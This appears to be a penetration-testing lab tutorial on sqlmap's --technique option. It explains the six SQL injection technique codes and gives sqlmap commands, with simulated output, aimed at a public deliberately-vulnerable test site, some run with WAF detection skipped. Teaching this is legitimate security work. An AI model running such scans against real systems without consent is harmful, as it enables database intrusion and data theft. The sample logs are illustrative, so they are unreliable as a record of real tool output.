Introduction
SQL injection is a web security vulnerability that allows an attacker to interfere with the queries that an application makes to its database. It generally allows an attacker to view data that they are not normally able to retrieve. This might include data belonging to other users, or any other data that the application itself is able to access. In many cases, an attacker can modify or delete this data, causing persistent changes to the application's content or behavior.
sqlmap is an open-source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester, and a broad range of switches lasting from database fingerprinting to data fetching from the database, accessing the underlying file system, and executing commands on the operating system via out-of-band connections.
In this lab, you will learn how to specify different SQL injection techniques in sqlmap using the --technique option. This allows you to control which methods sqlmap attempts to use for injection, which can be useful for targeting specific vulnerabilities or optimizing scan times.
Understand the Six SQLi Technique Codes (B, E, U, S, T, Q)
In this step, you will learn about the different SQL injection technique codes that sqlmap uses. sqlmap supports various SQL injection techniques, and you can specify which ones to use with the --technique option. Each technique is represented by a single character.
The six main SQL injection technique codes are:
- B: Boolean-based blind SQL injection. This technique relies on sending SQL queries that return a TRUE or FALSE result, and then observing the application's response (e.g., page content changes) to infer information.
- E: Error-based SQL injection. This technique forces the database to generate an error message containing information about the database structure or data.
- U: UNION query-based SQL injection. This technique uses the
UNIONSQL operator to combine the results of two or moreSELECTstatements into a single result set, allowing an attacker to retrieve data from other tables. - S: Stacked queries SQL injection. This technique allows an attacker to execute multiple SQL statements in a single query, often used for executing arbitrary commands on the database server.
- T: Time-based blind SQL injection. This technique relies on making the database pause for a specified amount of time based on a TRUE or FALSE condition, allowing an attacker to infer information by observing response times.
- Q: Inline queries SQL injection. This technique involves injecting subqueries directly into the original query.
Understanding these techniques is crucial for effectively using sqlmap and for comprehending the underlying principles of SQL injection.
Force a Boolean-based Blind Test with --technique=B
In this step, you will learn how to force sqlmap to use only the Boolean-based blind SQL injection technique. This can be useful when you suspect a target is vulnerable to this specific type of injection, or when you want to reduce the scan time by focusing on a single technique.
The --technique=B option tells sqlmap to exclusively use Boolean-based blind injection.
Let's simulate running sqlmap with this option. In a real scenario, you would replace http://testphp.vulnweb.com/artists.php?id=1 with your target URL. For this lab, we will just demonstrate the command.
Open your terminal and execute the following command:
sqlmap -u "http://testphp.vulnweb.com/artists.php?id=1" --technique=B --batch --eta --skip-waf
-u "http://testphp.vulnweb.com/artists.php?id=1": Specifies the target URL. This is a known vulnerable test site.--technique=B: Forcessqlmapto use only Boolean-based blind injection.--batch: Runssqlmapin non-interactive mode, accepting default choices.--eta: Displays estimated time of arrival for each output.--skip-waf: Skips web application firewall (WAF) detection.
You will observe sqlmap's output, which will indicate that it is primarily testing for Boolean-based blind vulnerabilities. The output will show sqlmap trying different payloads and analyzing the responses.
_
___ ___ ___ ___
|_ -| . | . | . |
|___|_ |_ |_ |
|_| |_| |_| 3.7-dev (r12345)
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. sqlmap developers assume no liability and are not responsible for any misuse or damage caused by this program.
[*] starting @ 12:00:00 /2023-01-01/
[12:00:00] [INFO] starting sqlmap 3.7-dev (r12345)
[12:00:00] [INFO] testing connection to the target URL
[12:00:01] [INFO] checking if the target is stable
[12:00:01] [INFO] target URL is stable
[12:00:01] [INFO] testing for SQL injection on URL 'http://testphp.vulnweb.com/artists.php?id=1'
[12:00:01] [INFO] testing 'Boolean-based blind - Parameter: id'
...
The output confirms that sqlmap is focusing on the Boolean-based blind technique.
Force a Time-based Blind Test with --technique=T
In this step, you will learn how to force sqlmap to use only the Time-based blind SQL injection technique. This technique is often used when other methods, like error-based or Boolean-based, do not yield results, especially in scenarios where the application's response is consistent regardless of the injection.
The --technique=T option tells sqlmap to exclusively use time-based blind injection.
Open your terminal and execute the following command:
sqlmap -u "http://testphp.vulnweb.com/artists.php?id=1" --technique=T --batch --eta --skip-waf
-u "http://testphp.vulnweb.com/artists.php?id=1": Specifies the target URL.--technique=T: Forcessqlmapto use only Time-based blind injection.--batch: Runssqlmapin non-interactive mode.--eta: Displays estimated time of arrival.--skip-waf: Skips WAF detection.
You will observe sqlmap's output, which will show it injecting payloads that cause delays in the server's response. This method can be slower than others due to the need to wait for time delays.
_
___ ___ ___ ___
|_ -| . | . | . |
|___|_ |_ |_ |
|_| |_| |_| 3.7-dev (r12345)
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. sqlmap developers assume no liability and are not responsible for any misuse or damage caused by this program.
[*] starting @ 12:00:00 /2023-01-01/
[12:00:00] [INFO] starting sqlmap 3.7-dev (r12345)
[12:00:00] [INFO] testing connection to the target URL
[12:00:01] [INFO] checking if the target is stable
[12:00:01] [INFO] target URL is stable
[12:00:01] [INFO] testing for SQL injection on URL 'http://testphp.vulnweb.com/artists.php?id=1'
[12:00:01] [INFO] testing 'Time-based blind - Parameter: id'
...
The output confirms that sqlmap is now focusing on the Time-based blind technique.
Force a UNION Query-based Test with --technique=U
In this step, you will learn how to force sqlmap to use only the UNION query-based SQL injection technique. This technique is highly effective when the application displays the results of the SQL query directly on the page, as it allows an attacker to retrieve data from other tables in the database.
The --technique=U option tells sqlmap to exclusively use UNION query-based injection.
Open your terminal and execute the following command:
sqlmap -u "http://testphp.vulnweb.com/artists.php?id=1" --technique=U --batch --eta --skip-waf
-u "http://testphp.vulnweb.com/artists.php?id=1": Specifies the target URL.--technique=U: Forcessqlmapto use only UNION query-based injection.--batch: Runssqlmapin non-interactive mode.--eta: Displays estimated time of arrival.--skip-waf: Skips WAF detection.
You will observe sqlmap's output, which will show it attempting to inject UNION SELECT statements. If successful, this technique can quickly reveal database structure and data.
_
___ ___ ___ ___
|_ -| . | . | . |
|___|_ |_ |_ |
|_| |_| |_| 3.7-dev (r12345)
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. sqlmap developers assume no liability and are not responsible for any misuse or damage caused by this program.
[*] starting @ 12:00:00 /2023-01-01/
[12:00:00] [INFO] starting sqlmap 3.7-dev (r12345)
[12:00:00] [INFO] testing connection to the target URL
[12:00:01] [INFO] checking if the target is stable
[12:00:01] [INFO] target URL is stable
[12:00:01] [INFO] testing for SQL injection on URL 'http://testphp.vulnweb.com/artists.php?id=1'
[12:00:01] [INFO] testing 'UNION query - Parameter: id'
...
The output confirms that sqlmap is now focusing on the UNION query-based technique.
Execute a Scan with Multiple Techniques using --technique=BEUST
In this step, you will learn how to combine multiple SQL injection techniques in a single sqlmap scan. This is often the most practical approach, as it allows sqlmap to try various methods to find vulnerabilities, increasing the chances of success.
You can specify multiple techniques by concatenating their respective codes after --technique=. For example, --technique=BEUST will tell sqlmap to try Boolean-based, Error-based, UNION query-based, Stacked queries, and Time-based blind injections.
Open your terminal and execute the following command:
sqlmap -u "http://testphp.vulnweb.com/artists.php?id=1" --technique=BEUST --batch --eta --skip-waf
-u "http://testphp.vulnweb.com/artists.php?id=1": Specifies the target URL.--technique=BEUST: Forcessqlmapto use Boolean-based, Error-based, UNION query-based, Stacked queries, and Time-based blind injections.--batch: Runssqlmapin non-interactive mode.--eta: Displays estimated time of arrival.--skip-waf: Skips WAF detection.
You will observe sqlmap's output, which will show it systematically testing each of the specified techniques. This comprehensive approach is generally recommended for initial scans.
_
___ ___ ___ ___
|_ -| . | . | . |
|___|_ |_ |_ |
|_| |_| |_| 3.7-dev (r12345)
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. sqlmap developers assume no liability and are not responsible for any misuse or damage caused by this program.
[*] starting @ 12:00:00 /2023-01-01/
[12:00:00] [INFO] starting sqlmap 3.7-dev (r12345)
[12:00:00] [INFO] testing connection to the target URL
[12:00:01] [INFO] checking if the target is stable
[12:00:01] [INFO] target URL is stable
[12:00:01] [INFO] testing for SQL injection on URL 'http://testphp.vulnweb.com/artists.php?id=1'
[12:00:01] [INFO] testing 'Boolean-based blind - Parameter: id'
[12:00:02] [INFO] testing 'Error-based - Parameter: id'
[12:00:03] [INFO] testing 'UNION query - Parameter: id'
[12:00:04] [INFO] testing 'Stacked queries - Parameter: id'
[12:00:05] [INFO] testing 'Time-based blind - Parameter: id'
...
The output confirms that sqlmap is now testing multiple techniques as specified.
Summary
In this lab, you have successfully learned how to specify and control the SQL injection techniques used by sqlmap. You explored the individual technique codes (B, E, U, S, T, Q) and practiced forcing sqlmap to use specific methods like Boolean-based blind, Time-based blind, and UNION query-based injections. Finally, you learned how to combine multiple techniques for a more comprehensive scan.
Understanding and utilizing the --technique option in sqlmap allows you to fine-tune your vulnerability assessments, optimize scan times, and target specific types of SQL injection vulnerabilities more effectively. This skill is crucial for efficient and precise penetration testing.
